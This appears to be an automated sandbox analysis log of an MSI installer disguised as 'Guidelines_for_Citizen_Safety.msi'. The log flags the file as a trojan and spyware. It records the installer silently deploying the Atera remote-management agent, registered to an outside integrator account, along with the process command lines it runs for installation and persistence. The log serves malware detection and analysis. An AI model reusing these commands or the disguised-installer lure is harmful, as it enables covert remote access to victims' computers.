                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_043359A86_3_043359A8
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_04334D686_3_04334D68
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFAAB45C92213_2_00007FFAAB45C922
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 13_2_00007FFAAB45BB7613_2_00007FFAAB45BB76
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB481BEE15_2_00007FFAAB481BEE
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB460C5815_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB47CA3015_2_00007FFAAB47CA30
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB47C91015_2_00007FFAAB47C910
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB48603015_2_00007FFAAB486030
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB471CE015_2_00007FFAAB471CE0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB48387015_2_00007FFAAB483870
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB469AF215_2_00007FFAAB469AF2
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB47900E15_2_00007FFAAB47900E
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB674BFA15_2_00007FFAAB674BFA
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB67AC9715_2_00007FFAAB67AC97
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB67E2FA15_2_00007FFAAB67E2FA
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 15_2_00007FFAAB678FED15_2_00007FFAAB678FED
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_3_06B5004018_3_06B50040
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB44FA9419_2_00007FFAAB44FA94
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB4478D619_2_00007FFAAB4478D6
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB45100A19_2_00007FFAAB45100A
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB44868219_2_00007FFAAB448682
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB4412FB19_2_00007FFAAB4412FB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB4510C019_2_00007FFAAB4510C0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 19_2_00007FFAAB44BD1019_2_00007FFAAB44BD10
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB48047D23_2_00007FFAAB48047D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB46FA9423_2_00007FFAAB46FA94
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB4678D623_2_00007FFAAB4678D6
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB46182823_2_00007FFAAB461828
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB47108C23_2_00007FFAAB47108C
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB46868223_2_00007FFAAB468682
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB4612FA23_2_00007FFAAB4612FA
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB4710C023_2_00007FFAAB4710C0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 23_2_00007FFAAB46BDB023_2_00007FFAAB46BDB0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB49047D25_2_00007FFAAB49047D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB47FA9425_2_00007FFAAB47FA94
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB4778D625_2_00007FFAAB4778D6
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB48100A25_2_00007FFAAB48100A
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB47868225_2_00007FFAAB478682
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB4712FB25_2_00007FFAAB4712FB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB4810C025_2_00007FFAAB4810C0
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 25_2_00007FFAAB47BDB025_2_00007FFAAB47BDB0
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                              Source: Guidelines_for_Citizen_Safety.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: Guidelines_for_Citizen_Safety.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: Guidelines_for_Citizen_Safety.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: AteraAgent.exe.2.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                              Source: classification engineClassification label: mal88.troj.spyw.evad.winMSI@37/86@13/2
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA NetworksJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4856:120:WilError_03
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6564:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7652:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF9340E6CB357EA061.TMPJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                              Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                              Source: Guidelines_for_Citizen_Safety.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                              Source: Guidelines_for_Citizen_Safety.msiReversingLabs: Detection: 28%
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"
                              Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22FJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentIdJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStartJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEndJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
